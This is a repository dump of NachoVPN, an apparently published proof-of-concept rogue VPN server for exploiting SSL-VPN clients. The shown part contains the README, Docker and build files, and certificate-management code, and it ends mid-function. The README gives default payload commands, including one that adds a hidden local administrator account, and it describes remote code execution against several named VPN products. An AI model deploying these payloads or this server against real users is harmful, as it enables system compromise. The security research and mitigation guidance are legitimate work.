Repository: AmberWolfCyber/NachoVPN Branch: main Commit: f1e891f8b1af Files: 72 Total size: 410.4 KB Directory structure: gitextract_izup__0x/ ├── .gitattributes ├── .github/ │ └── workflows/ │ └── build-docker.yml ├── .gitignore ├── Dockerfile ├── LICENSE ├── MANIFEST.in ├── README.md ├── docker-compose.yml ├── entrypoint.sh ├── requirements.txt ├── setup.py └── src/ └── nachovpn/ ├── __init__.py ├── core/ │ ├── __init__.py │ ├── cert_manager.py │ ├── db_manager.py │ ├── ip_manager.py │ ├── packet_handler.py │ ├── plugin_manager.py │ ├── request_handler.py │ ├── smb_manager.py │ └── utils.py ├── plugins/ │ ├── __init__.py │ ├── base/ │ │ ├── __init__.py │ │ ├── plugin.py │ │ └── templates/ │ │ └── 404.html │ ├── cisco/ │ │ ├── __init__.py │ │ ├── files/ │ │ │ ├── OnConnect.sh │ │ │ ├── OnConnect.vbs │ │ │ └── OnDisconnect.vbs │ │ ├── plugin.py │ │ └── templates/ │ │ ├── login.xml │ │ ├── prelogin.xml │ │ └── profile.xml │ ├── delinea/ │ │ ├── __init__.py │ │ ├── plugin.py │ │ └── templates/ │ │ ├── GetLauncherArguments.xml │ │ ├── GetNextProtocolHandlerVersion.xml │ │ ├── GetSymmetricKey.xml │ │ ├── UpdateStatusV2.xml │ │ └── index.html │ ├── example/ │ │ ├── __init__.py │ │ └── plugin.py │ ├── netskope/ │ │ ├── __init__.py │ │ ├── files/ │ │ │ └── STAgent.msi │ │ ├── plugin.py │ │ └── templates/ │ │ └── auth.html │ ├── paloalto/ │ │ ├── __init__.py │ │ ├── msi_downloader.py │ │ ├── msi_patcher.py │ │ ├── pkg_generator.py │ │ ├── plugin.py │ │ └── templates/ │ │ ├── getconfig.xml │ │ ├── prelogin.xml │ │ ├── pwresponse.xml │ │ ├── sslvpn-login.xml │ │ └── sslvpn-prelogin.xml │ ├── pulse/ │ │ ├── __init__.py │ │ ├── config_generator.py │ │ ├── config_parser.py │ │ ├── funk_parser.py │ │ ├── plugin.py │ │ └── test/ │ │ ├── example_rules.json │ │ └── test_policy.py │ └── sonicwall/ │ ├── __init__.py │ ├── files/ │ │ └── NACAgent.c │ ├── plugin.py │ └── templates/ │ ├── launchextender.html │ ├── launchplatform.html │ ├── logout.html │ ├── welcome.html │ └── wxacneg.html └── server.py ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ * text=auto *.sh text eol=lf ================================================ FILE: .github/workflows/build-docker.yml ================================================ name: Docker Build on: push: branches: ['release'] env: REGISTRY: ghcr.io IMAGE_NAME: ${{ github.repository }} jobs: build-and-push-image: runs-on: ubuntu-latest permissions: contents: read packages: write attestations: write id-token: write steps: - name: Checkout repository uses: actions/checkout@v4 - name: Log in to the Container registry uses: docker/login-action@65b78e6e13532edd9afa3aa52ac7964289d1a9c1 with: registry: ${{ env.REGISTRY }} username: ${{ github.actor }} password: ${{ secrets.GITHUB_TOKEN }} - name: Extract metadata (tags, labels) for Docker id: meta uses: docker/metadata-action@9ec57ed1fcdbf14dcef7dfbe97b2010124a938b7 with: images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} tags: | type=ref,event=branch type=raw,value=latest - name: Build and push Docker image id: push uses: docker/build-push-action@f2a1d5e99d037542a71f64918e516c093c6f3fc4 with: context: . push: true tags: ${{ steps.meta.outputs.tags }} labels: ${{ steps.meta.outputs.labels }} ================================================ FILE: .gitignore ================================================ # Ignore virtual environment directories env/ venv/ # Ignore environment files .env # Ignore compiled Python files *.pyc __pycache__/ # Ignore log files and debugging artifacts *.log # Ignore coverage reports .coverage .coverage.* htmlcov/ *.cover # Ignore cache files and directories *.egg-info/ .eggs/ *.egg *.pyo *.pyd *.pdb .cache/ *.pytest_cache/ *.zip # Ignore distribution files dist/ build/ *.wheel # Ignore your specific directories certs/ downloads/ payloads/ pcaps/ # Ignore testing artifacts .tox/ .nox/ .pytest_cache/ # Ignore IDE/project-specific files .vscode/ .idea/ *.iml # Ignore database files *.sqlite3 *.db # Ignore temporary files *.tmp *.swp *.swo *.bak *.orig .DS_Store ================================================ FILE: Dockerfile ================================================ FROM ubuntu:jammy WORKDIR /app ENV PYTHONDONTWRITEBYTECODE=1 ENV PYTHONUNBUFFERED=1 RUN apt-get update && apt-get install -y --no-install-recommends \ gcc \ libffi-dev \ libssl-dev \ osslsigncode \ msitools \ mingw-w64 \ gcc-mingw-w64 \ python3 \ python3-pip \ python-is-python3 \ python3-nftables \ nftables \ && apt-get clean && rm -rf /var/lib/apt/lists/* COPY setup.py . COPY MANIFEST.in . COPY requirements.txt . COPY src/ src/ RUN pip install --no-cache-dir -r requirements.txt RUN pip install --no-cache-dir certbot RUN python setup.py sdist bdist_wheel RUN pip install --no-cache-dir dist/*.whl EXPOSE 80 EXPOSE 443 COPY entrypoint.sh . RUN chmod +x entrypoint.sh ENTRYPOINT ["/bin/bash", "-c", "./entrypoint.sh"] ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2024 AmberWolf Ltd. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: MANIFEST.in ================================================ recursive-include src/nachovpn/plugins **/templates/* recursive-include src/nachovpn/plugins **/files/* ================================================ FILE: README.md ================================================ # NachoVPN 🌮🔒

NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients, using a rogue VPN server. It uses a plugin-based architecture so that support for additional SSL-VPN products can be contributed by the community. It currently supports various popular corporate VPN products, such as Cisco AnyConnect, SonicWall NetExtender, Palo Alto GlobalProtect, and Ivanti Connect Secure. For further details, see our [blog post](https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/), and HackFest Hollywood 2024 presentation [[slides](https://github.com/AmberWolfCyber/presentations/blob/main/2024/Very%20Pwnable%20Networks%20-%20HackFest%20Hollywood%202024.pdf)|[video](https://www.youtube.com/watch?v=-MZfkmcZRVg)]. ## Installation ### Prerequisites * Python 3.9 or later * Docker (optional) * osslsigncode (Linux only) * msitools (Linux only) * python3-netfilter (Linux only) * git ### Linux Setup NachoVPN is built and tested on Ubuntu 22.04. * Install `python3-nftables` and `nftables` * Optionally use `setcap` to avoid `sudo` requirement: ```bash sudo setcap 'cap_net_raw,cap_net_bind_service,cap_net_admin=eip' /usr/bin/python3.10 ``` * Enable IP forwarding: ```bash sudo sysctl -w net.ipv4.ip_forward=1 ``` ### Installing from source NachoVPN can be installed from GitHub using pip. Note that this requires git to be installed. First, create a virtual environment. On Linux, ensure that the virtual env has access to the system `site-packages`, so that `nftables` works: ```bash python3 -m venv env --system-site-packages source env/bin/activate ``` On Windows, nftables (and thus packet forwarding) is disabled, so use: ```bash python -m venv env .\env\Scripts\activate ``` Then, install NachoVPN: ```bash pip install git+https://github.com/AmberWolfCyber/NachoVPN.git ``` If you prefer to use Docker, then you can pull the container from the GitHub Container Registry: ```bash docker pull ghcr.io/AmberWolfCyber/nachovpn:release ``` ## Building for distribution ### Building a wheel file First, clone this repository, and install `setuptools` and `wheel` via pip. You can then run the `setup.py` script: ```bash git clone https://github.com/AmberWolfCyber/NachoVPN pip install -U setuptools wheel python setup.py bdist_wheel ``` This will generate a wheel file in the `dist` directory, which can be installed with pip: ```bash pip install dist/nachovpn-1.0.0-py3-none-any.whl ``` ### Building for local development Alternatively, for local development you can install the package in editable mode using: ```bash pip install -e . ``` ### Building a container image You can build the container image with the following command: ```bash docker build -t nachovpn:latest . ``` ## Running To run the server as standalone, use: ``` python -m nachovpn.server ``` Alternatively, you can run the server using Docker: ```bash docker run -e SERVER_FQDN=connect.nachovpn.local -e EXTERNAL_IP=1.2.3.4 -v ./certs:/app/certs -p 80:80 -p 443:443 --rm -it nachovpn ``` This will generate a certificate for the `SERVER_FQDN` using certbot, and save it to the `certs` directory, which we've mounted into the container. Alternatively, for testing purposes, you can skip the certificate generation by setting the `SKIP_CERTBOT` environment variable. This will generate a self-signed certificate instead. ```bash docker run -e SERVER_FQDN=connect.nachovpn.local -e SKIP_CERTBOT=1 -e EXTERNAL_IP=1.2.3.4 -p 443:443 --rm -it nachovpn ``` An example [docker-compose file](docker-compose.yml) is also provided for convenience. ### Debugging You can run `nachovpn` with the `-d` or `--debug` command line arguments in order to increase the verbosity of logging, which can aid in debugging. Alternatively, if the logging is too noisy, you can use the `q` or `--quiet` command line argument instead. ### Plugins NachoVPN supports the following plugins and capabilities: | Plugin | Product | CVE | Windows RCE | macOS RCE | Privileged | URI Handler | Packet Capture | Demo | | -------- | ----------- | -------- | -------- | -------- | -------- | -------- | -------- | ---- | | Cisco | Cisco AnyConnect | N/A | ✅ | ✅ | ❌ | ❌ | ✅ | [Windows](https://vimeo.com/1024773762) / [macOS](https://vimeo.com/1024773668) | | SonicWall | SonicWall NetExtender | [CVE-2024-29014](https://blog.amberwolf.com/blog/2024/november/sonicwall-netextender-for-windows---rce-as-system-via-epc-client-update-cve-2024-29014/) | ✅ | ❌ | ✅ | ✅ | ❌ | [Windows](https://vimeo.com/1024774407) | | PaloAlto | Palo Alto GlobalProtect | [CVE-2024-5921](https://blog.amberwolf.com/blog/2024/november/palo-alto-globalprotect---code-execution-and-privilege-escalation-via-malicious-vpn-server-cve-2024-5921/) [(partial fix)](https://blog.amberwolf.com/blog/2025/august/nachovpn-update---palo-alto-globalprotect/) | ✅ | ✅ | ✅ | ❌ | ✅ | [Windows](https://vimeo.com/1024774239) / [macOS](https://vimeo.com/1024773987) / [iOS](https://vimeo.com/1024773956) | | PulseSecure | Ivanti Connect Secure | [CVE-2020-8241 (bypassed)](https://blog.amberwolf.com/blog/2025/july/nachovpn-update---ivanti-connect-secure/) | ✅ | ✅ | ✅ | ✅ (Windows only - disabled by default in [22.8R1](https://help.ivanti.com/ps/help/en_US/ISAC/22.X/rn-22.X/noteworthy-information.htm)) | ✅ | [Windows](https://vimeo.com/1024773914) | | Netskope | Netskope | [CVE-2025-0309](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/) | ✅ | ❌ | ✅ | ❌ | ❌ | [Windows](https://vimeo.com/1114191607) | | Delinea | Protocol Handler | [CVE-2026-????](https://blog.amberwolf.com/blog/2026/february/delinea-protocol-handler---return-of-the-msi/) | ✅ | ✅ | ❌ | ✅ | ❌ | [Windows](https://vimeo.com/1168821295) | #### URI handlers * The Ivanti Connect Secure (Pulse Secure) URI handler can be triggered by visiting the `/pulse` URL on the NachoVPN server. * The SonicWall NetExtender URI handler can be triggered by visiting the `/sonicwall` URL on the NachoVPN server. This requires that the SonicWall Connect Agent is installed on the client machine. * The Delinea URI handler can be triggered by visiting the `/delinea` URL on the NachoVPN server. #### Operating Notes * It is recommended to use a TLS certificate that is signed by a trusted Certificate Authority. The docker container automates this process for you, using certbot. If you do not use a trusted certificate, then NachoVPN will generate a self-signed certificate instead, which in most cases will either cause the client to prompt with a certificate warning, or it will refuse to connect unless you modify the client settings to accept self-signed certificates. For the Palo Alto GlobalProtect plugin, this will also cause the MSI installer to fail. * In order to simulate a valid codesigning certificate for the SonicWall plugin, NachoVPN will sign the `NACAgent.exe` payload with a self-signed certificate. For testing purposes, you can download and install this CA certificate from `/sonicwall/ca.crt` before triggering the exploit. For production use-cases, you will need to obtain a valid codesigning certificate from a public CA, sign your `NACAgent.exe` payload, and place it in the `payloads` directory (or volume mount it into `/app/payloads`, if using docker). * For convenience, a default `NACAgent.exe` payload is generated for the SonicWall plugin, and written to the `payloads` directory. This simply spawns a new `cmd.exe` process on the current user's desktop, running as `SYSTEM`. * The Palo Alto GlobalProtect plugin requires that the MSI installers and `msi_version.txt` file are present in the `downloads` directory. Either add these manually, or run the `msi_downloader.py` script to download them. * To perform the Palo Alto GlobalProtect downgrade attack, ensure that the `GlobalProtect.msi.old` and `GlobalProtect64.msi.old` are present in the `downloads` folder. These files should contain the *unmodified* MSI installers for a version *prior* to 6.2.6 (e.g. 6.2.5). #### Disabling a plugin To disable a plugin, add it to the `DISABLED_PLUGINS` environment variable. For example: ```bash DISABLED_PLUGINS=CiscoPlugin,SonicWallPlugin ``` ### Environment Variables NachoVPN is configured using environment variables. This makes it easily compatible with containerised deployments. Global environment variables: | Variable | Description | Default | | -------- | ----------- | ------- | | `SERVER_FQDN` | The fully qualified domain name of the server. | `connect.nachovpn.local` | | `EXTERNAL_IP` | The external IP address of the server. | `127.0.0.1` | | `WRITE_PCAP` | Whether to write captured PCAP files to disk. | `false` | | `DISABLED_PLUGINS` | A comma-separated list of plugins to disable. | | | `USE_DYNAMIC_SERVER_THUMBPRINT` | Whether to calculate the server certificate thumbprint dynamically from the server (useful if behind a proxy). | `false` | | `SERVER_SHA1_THUMBPRINT` | Allows overriding the calculated SHA1 thumbprint for the server certificate. | | | `SERVER_MD5_THUMBPRINT` | Allows overriding the calculated MD5 thumbprint for the server certificate. | | | `SMB_ENABLED` | Enables the SMB share, available via the tunnel at `\\10.10.0.1\` | `false` | | `SMB_SHARE_NAME` | The name to use for the SMB share | `SHARE` | | `SMB_SHARE_PATH` | The path to the directory to use for the SMB share | `smb` | | `TUNNEL_PRIVATE` | When set to `true`, enables tunneling but disables internet forwarding for VPN clients. Clients can only access the SMB share. | `false` | | `TUNNEL_FULL` | When set to `true`, enables full tunneling and allows VPN clients to access the internet. Also implies `TUNNEL_PRIVATE=true`. | `false` | Plugin specific environment variables: | Variable | Description | Default | | -------- | ----------- | ------- | | `VPN_NAME` | The name of the VPN profile, which is presented to the client for Cisco AnyConnect. | `NachoVPN` | | `PULSE_LOGON_SCRIPT` | The path to the Pulse Secure logon script. | `C:\Windows\System32\calc.exe` | | `PULSE_LOGON_SCRIPT_MACOS` | The path to the Pulse Secure logon script for macOS. | | | `PULSE_DNS_SUFFIX` | The DNS suffix to be used for Pulse Secure connections. | `nachovpn.local` | | `PULSE_USERNAME` | The username to be pre-filled in the Pulse Secure logon dialog. | | | `PULSE_SAVE_CONNECTION` | Whether to save the Pulse Secure connection in the user's client. | `false` | | `PULSE_ANONYMOUS_AUTH` | Whether to use anonymous authentication for Pulse Secure connections. If set to `true`, the user will not be prompted for a username or password. | `false` | | `PULSE_HOST_CHECKER_RULES_FILE` | A JSON file containing a list of registry-based host-checker rules for ICS. See example in `src/nachovpn/plugins/pulse/test/example_rules.json` | | | `PALO_ALTO_MSI_ADD_FILE` | The path to a file to be added to the Palo Alto installer MSI. | | | `PALO_ALTO_MSI_COMMAND` | The command to be executed by the Palo Alto installer MSI. | `net user pwnd Passw0rd123! /add && net localgroup administrators pwnd /add` | | `PALO_ALTO_FORCE_PATCH` | Whether to force the patching of the MSI installer if it already exists in the payloads directory. | `false` | | `PALO_ALTO_PKG_COMMAND` | The command to be executed by the Palo Alto installer PKG on macOS. | `touch /tmp/pwnd` | | `CISCO_COMMAND_WIN` | The command to be executed by the Cisco AnyConnect OnConnect.vbs script on Windows. | `calc.exe` | | `CISCO_COMMAND_MACOS` | The command to be executed by the Cisco AnyConnect OnConnect.sh script on macOS. | `touch /tmp/pwnd` | ## Mitigations We recommend the following mitigations: * Ensure SSL-VPN clients are updated to the latest version available from the vendor. * Most VPN clients support the concept of locking down the VPN profile to a specific endpoint, or using an always-on VPN mode. This should be enabled where possible. * Unfortunately, in some cases this lockdown can be removed by a malicious local user, therefore it is also recommended to use host-based firewall rules to restrict the IP addresses that the VPN client can communicate with. * Consider using an Application Control policy, such as WDAC, or an EDR solution to ensure that only approved executables and scripts can be executed by the VPN client. * Detect and alert on VPN clients executing non-standard child processes. ## References * [AmberWolf Blog: NachoVPN](https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/) * [HackFest Hollywood 2024: Very Pwnable Networks: Exploiting the Top Corporate VPN Clients for Remote Root and SYSTEM Shells, Rich Warren & David Cash](https://github.com/AmberWolfCyber/presentations/blob/main/2024/Very%20Pwnable%20Networks%20-%20HackFest%20Hollywood%202024.pdf) [[video](https://www.youtube.com/watch?v=-MZfkmcZRVg)] * [BlackHat 2008: Leveraging the Edge: Abusing SSL VPNs, Mike Zusman](https://www.blackhat.com/presentations/bh-usa-08/Zusman/BH_US_08_Zusman_SSL_VPN_Abuse.pdf) * [BlackHat 2019: Infiltrating Corporate Intranet Like NSA, Orange Tsai & Meh Chang](https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf) * [NCC Group: Making New Connections: Leveraging Cisco AnyConnect Client to Drop and Run Payloads, David Cash & Julian Storr](https://www.nccgroup.com/uk/research-blog/making-new-connections-leveraging-cisco-anyconnect-client-to-drop-and-run-payloads/) * [The OpenConnect Project](https://www.infradead.org/openconnect/) ## Contributing We welcome contributions! Please open an issue or raise a Pull Request. If you're interested in developing a new plugin, you can take a look at the [ExamplePlugin](src/nachovpn/plugins/example/plugin.py) to get started. ## License NachoVPN is licensed under the MIT license. See the [LICENSE](LICENSE) file for details. ================================================ FILE: docker-compose.yml ================================================ services: nachovpn: container_name: nachovpn build: context: . dockerfile: Dockerfile restart: unless-stopped ports: - "443:443" - "80:80" volumes: - ./certs/:/app/certs/ - ./payloads/:/app/payloads/ - ./downloads/:/app/downloads/ - ./payloads/:/app/payloads/ environment: - SERVER_FQDN=${SERVER_FQDN:-} - EXTERNAL_IP=${EXTERNAL_IP:-} - SKIP_CERTBOT=${SKIP_CERTBOT:-} networks: - backend networks: backend: ================================================ FILE: entrypoint.sh ================================================ #!/bin/bash #if [[ -z "${SERVER_FQDN}" ]]; then # echo "Error: SERVER_FQDN is not set or is empty" # exit 1 #fi #if [[ -z "${EXTERNAL_IP}" ]]; then # echo "Error: EXTERNAL_IP is not set or is empty" # exit 1 #fi CERT_PATH="/app/certs/server-dns.crt" KEY_PATH="/app/certs/server-dns.key" if [[ -n "${SKIP_CERTBOT}" ]]; then echo "SKIP_CERTBOT is set. Skipping Certbot execution." elif [[ -n "${WEBSITE_HOSTNAME}" ]]; then echo "WEBSITE_HOSTNAME is set. Skipping Certbot execution." elif [[ -f "$CERT_PATH" && -f "$KEY_PATH" ]]; then echo "Certificate and key already exist. Skipping Certbot execution." else # Request a certificate from letsencrypt certbot certonly \ --standalone \ --preferred-challenges http-01 \ --register-unsafely-without-email \ --agree-tos \ --non-interactive \ --no-eff-email \ --domain "$SERVER_FQDN" if [[ $? -eq 0 ]]; then echo "Certificate successfully generated." # Copy the certs cp "/etc/letsencrypt/live/$SERVER_FQDN/fullchain.pem" "$CERT_PATH" cp "/etc/letsencrypt/live/$SERVER_FQDN/privkey.pem" "$KEY_PATH" echo "Certificate and key copied to:" echo " Certificate: $CERT_PATH" echo " Key: $KEY_PATH" else echo "Certbot failed to generate the certificate." exit 2 fi fi # Build CLI arguments CLI_ARGS="" # Check for SERVER_PORT or WEBSITE_HOSTNAME (implies port 80) if [[ -n "${SERVER_PORT}" ]]; then CLI_ARGS="$CLI_ARGS --port $SERVER_PORT" elif [[ -n "${WEBSITE_HOSTNAME}" ]]; then CLI_ARGS="$CLI_ARGS --port 80" fi # Check for DISABLE_TLS or WEBSITE_HOSTNAME (implies no TLS) if [[ -n "${DISABLE_TLS}" || -n "${WEBSITE_HOSTNAME}" ]]; then CLI_ARGS="$CLI_ARGS --no-tls" fi echo "Starting nachovpn server with arguments: $CLI_ARGS" exec python -m nachovpn.server $CLI_ARGS ================================================ FILE: requirements.txt ================================================ blinker==1.7.0 certifi>=2024.2.2 cffi==1.16.0 charset-normalizer==3.3.2 click==8.1.7 colorama==0.4.6 cryptography==42.0.5 Flask==3.0.2 idna==3.6 itsdangerous==2.1.2 Jinja2==3.1.3 MarkupSafe==2.1.5 pycparser==2.21 requests==2.31.0 urllib3==2.2.1 Werkzeug==3.0.1 scapy==2.5.0 pycryptodome==3.20.0 pem==23.1.0 cabarchive==0.2.4 PyJWT==2.10.1 pyroute2==0.9.2 impacket==0.12.0 ================================================ FILE: setup.py ================================================ from setuptools import setup, find_packages setup( name="nachovpn", version="1.0.0", package_dir={"": "src"}, packages=find_packages(where="src"), include_package_data=True, install_requires=[ "cryptography==42.0.5", "jinja2>=3.0.0", "scapy>=2.5.0", "requests>=2.31.0", "flask>=3.0.2", "cabarchive>=0.2.4", "pycryptodome>=3.20.0", "PyJWT>=2.10.1", "pyroute2>=0.9.2", ], python_requires=">=3.9", description="A delicious, but malicious SSL-VPN server", entry_points={ "console_scripts": [ "nachovpn=nachovpn.server:main", ], }, ) ================================================ FILE: src/nachovpn/__init__.py ================================================ ================================================ FILE: src/nachovpn/core/__init__.py ================================================ ================================================ FILE: src/nachovpn/core/cert_manager.py ================================================ from cryptography import x509 from cryptography.x509.oid import NameOID, ExtendedKeyUsageOID, ObjectIdentifier from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.primitives.asymmetric import rsa, ec, padding import logging import datetime import hashlib import ipaddress import socket import certifi import ssl import os class CertManager: def __init__(self, cert_dir=os.path.join(os.getcwd(), 'certs'), ca_common_name="VPN Root CA"): self.cert_dir = cert_dir os.makedirs(cert_dir, exist_ok=True) self.ca_common_name = ca_common_name self.server_thumbprint = {} self.dns_name = os.getenv('SERVER_FQDN', socket.gethostname()) self.ip_address = os.getenv('EXTERNAL_IP', socket.gethostbyname(socket.gethostname())) def setup(self): """Setup the certificates and load the SSL context""" self.load_ca_certificate() self.load_dns_certificate() self.load_ip_certificate() self.create_ssl_context() # server thumbprint is a dictionary with sha1 and md5 hashes of the DNS cert self.server_thumbprint = self.get_cert_thumbprint(self.dns_cert_path) def create_ssl_context(self): """Create SSL context with SNI support and proper TLS configuration""" self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) def sni_callback(sslsocket, sni_name, sslcontext): try: if not sni_name: sslsocket.context = self.ssl_context return None logging.debug(f"SNI hostname requested: {sni_name}") # Create a new context for this connection ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) if sni_name == self.dns_name: ctx.load_cert_chain(self.dns_cert_path, self.dns_key_path) else: ctx.load_cert_chain(self.ip_cert_path, self.ip_key_path) # Set the new context sslsocket.context = ctx except Exception as e: logging.error(f"Error in SNI callback: {e}") return None # Set the SNI callback self.ssl_context.sni_callback = sni_callback # Load default certificate (IP cert) self.ssl_context.load_cert_chain( certfile=self.ip_cert_path, keyfile=self.ip_key_path ) return self.ssl_context def load_ip_certificate(self): """Load or generate a certificate for the server's external IP address""" self.ip_cert_path = os.path.join(self.cert_dir, f"server-ip.crt") self.ip_key_path = os.path.join(self.cert_dir, f"server-ip.key") if os.path.exists(self.ip_cert_path) and os.path.exists(self.ip_key_path) \ and self.cert_is_valid(self.ip_cert_path, self.ip_address): logging.info(f"Using existing certificate for: {self.ip_address}") return self.ip_cert_path, self.ip_key_path else: logging.info(f"Generating new certificate for: {self.ip_address}") return self.generate_server_certificate(self.ip_cert_path, self.ip_key_path, self.ip_address, additional_ekus=[ObjectIdentifier('1.3.6.1.5.5.7.3.5')], additional_sans=[x509.IPAddress(ipaddress.IPv4Address(self.ip_address)), x509.DNSName(self.dns_name)]) def load_dns_certificate(self): """Load or generate a certificate for the server's DNS name""" # this certificate may be volume mounted (e.g. when using certbot outside of the container) self.dns_cert_path = os.path.join(self.cert_dir, f"server-dns.crt") self.dns_key_path = os.path.join(self.cert_dir, f"server-dns.key") if os.path.exists(self.dns_cert_path) and os.path.exists(self.dns_key_path) \ and self.cert_is_valid(self.dns_cert_path, self.dns_name): logging.info(f"Using existing certificate for: {self.dns_name}") return self.dns_cert_path, self.dns_key_path else: logging.info(f"Generating new certificate for: {self.dns_name}") return self.generate_server_certificate(self.dns_cert_path, self.dns_key_path, self.dns_name, additional_sans=[x509.DNSName(self.dns_name)]) def load_ca_certificate(self): """Load or generate the CA certificate""" self.ca_cert_path = os.path.join(self.cert_dir, 'ca.crt') self.ca_key_path = os.path.join(self.cert_dir, 'ca.key') if os.path.exists(self.ca_cert_path) and os.path.exists(self.ca_key_path): with open(self.ca_cert_path, 'rb') as f: self.ca_cert = x509.load_pem_x509_certificate(f.read(), default_backend()) with open(self.ca_key_path, 'rb') as f: self.ca_key = serialization.load_pem_private_key(f.read(), password=None, backend=default_backend()) return self.ca_cert_path, self.ca_key_path else: return self.generate_ca_certificate() def cert_is_valid(self, cert_path, common_name): """Check if the certificate is valid""" # skip certificate validation if we're overriding the thumbprint or retrieving it dynamically from the server # this allows us to keep serving our origin certificate while advertising the proxy thumbprint # this is needed for certain proxies which require the origin has a valid certificate # if we didn't do this, the cert manager would detect a mismatch and re-generate the certificate if os.getenv('USE_DYNAMIC_SERVER_THUMBPRINT', 'false').lower() == 'true' or \ os.getenv('SERVER_SHA1_THUMBPRINT', '') != '' or \ os.getenv('SERVER_MD5_THUMBPRINT', '') != '': return True with open(cert_path, 'rb') as f: cert = x509.load_pem_x509_certificate(f.read(), default_backend()) date_valid = (cert.not_valid_before_utc \ <= datetime.datetime.now(datetime.timezone.utc) \ <= cert.not_valid_after_utc) if not date_valid: logging.error(f"Certificate for {common_name} is expired") return False cert_common_name = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value name_valid = cert_common_name == common_name if not name_valid: logging.error(f"Certificate for {cert_common_name} is not valid for {common_name}") return False # check if the issuer Common Name matches our self-signed CA # if the issuer name matches, but the cert is not validly signed by the current CA, return False # this helps to identify stale certificates when the CA certificate has been re-generated if cert.issuer.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value == self.ca_common_name: try: self.ca_cert.public_key().verify( cert.signature, cert.tbs_certificate_bytes, padding.PKCS1v15(), cert.signature_hash_algorithm, ) logging.info(f"Certificate is validly signed by our CA. Will not re-generate.") except Exception as e: logging.warning(f"Certificate is not validly signed by the current CA: {e}. Will re-generate.") return False else: # if the cert wasn't issued by our CA, then it's probably been signed by a public CA, # such as Let's Encrypt, and we should not re-generate it. # TODO: we may wish to check that the cert chains to a trusted root CA in the future, # but it doesn't really matter for our use case logging.warning(f"Certificate was not issued by our CA. Will not re-generate.") return True return True def get_thumbprint_from_server(self, server_address): """Get the certificate thumbprint from a server""" try: context = ssl.create_default_context() with socket.create_connection((server_address, 443), timeout=5) as sock: with context.wrap_socket(sock, server_hostname=server_address) as wrapped_sock: der_cert = wrapped_sock.getpeercert(binary_form=True) thumbprint_sha1 = hashlib.sha1(der_cert).hexdigest().upper() thumbprint_md5 = hashlib.md5(der_cert).hexdigest().upper() return {'sha1': thumbprint_sha1, 'md5': thumbprint_md5} except (socket.timeout, ssl.SSLError, ssl.CertificateError, OSError) as e: logging.error(f"Error getting thumbprint from server {server_address}: {e}") return None def get_cert_thumbprint(self, cert_path): """Calculate the certificate thumbprint""" with open(cert_path, 'rb') as f: cert = x509.load_pem_x509_certificate(f.read(), default_backend()) der_cert = cert.public_bytes(serialization.Encoding.DER) thumbprint_sha1 = hashlib.sha1(der_cert).hexdigest().upper() thumbprint_md5 = hashlib.md5(der_cert).hexdigest().upper() # allow overriding the thumbprint for fronting scenarios thumbprint_sha1 = os.getenv('SERVER_SHA1_THUMBPRINT', thumbprint_sha1) thumbprint_md5 = os.getenv('SERVER_MD5_THUMBPRINT', thumbprint_md5) return {'sha1': thumbprint_sha1, 'md5': thumbprint_md5} def generate_server_certificate(self, cert_path, key_path, common_name="*", additional_ekus=[], additional_sans=[]): """Generate a server certificate""" # Get CA cert if not self.ca_cert or not self.ca_key: self.load_ca_certificate() # Generate server private key cert_key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend() ) # Build server certificate signed by CA subject = x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, common_name), ]) # list of SANs san_list = additional_sans # list of EKUs eku_list = [ ExtendedKeyUsageOID.SERVER_AUTH, ExtendedKeyUsageOID.CLIENT_AUTH, ] + additional_ekus key_usage = x509.KeyUsage( digital_signature=True, key_encipherment=False, content_commitment=False, data_encipherment=False, key_agreement=False, encipher_only=False, decipher_only=False, key_cert_sign=False, crl_sign=False ) cert = x509.CertificateBuilder().subject_name( subject ).issuer_name( self.ca_cert.subject ).public_key( cert_key.public_key() ).serial_number( x509.random_serial_number() ).not_valid_before( datetime.datetime.utcnow() - datetime.timedelta(days=1) ).not_valid_after( datetime.datetime.utcnow() + datetime.timedelta(days=365) ).add_extension( x509.SubjectAlternativeName(san_list), critical=False, ).add_extension( x509.ExtendedKeyUsage(eku_list), critical=True, ).add_extension( key_usage, critical=True, ).sign(self.ca_key, hashes.SHA256(), default_backend()) # Convert certificate and key to PEM format cert_pem = cert.public_bytes(serialization.Encoding.PEM) key_pem = cert_key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption() ) with open(cert_path, 'wb') as cert_file: cert_file.write(cert_pem + self.ca_cert.public_bytes(serialization.Encoding.PEM)) with open(key_path, 'wb') as key_file: key_file.write(key_pem) return cert_path, key_path def generate_ca_certificate(self): 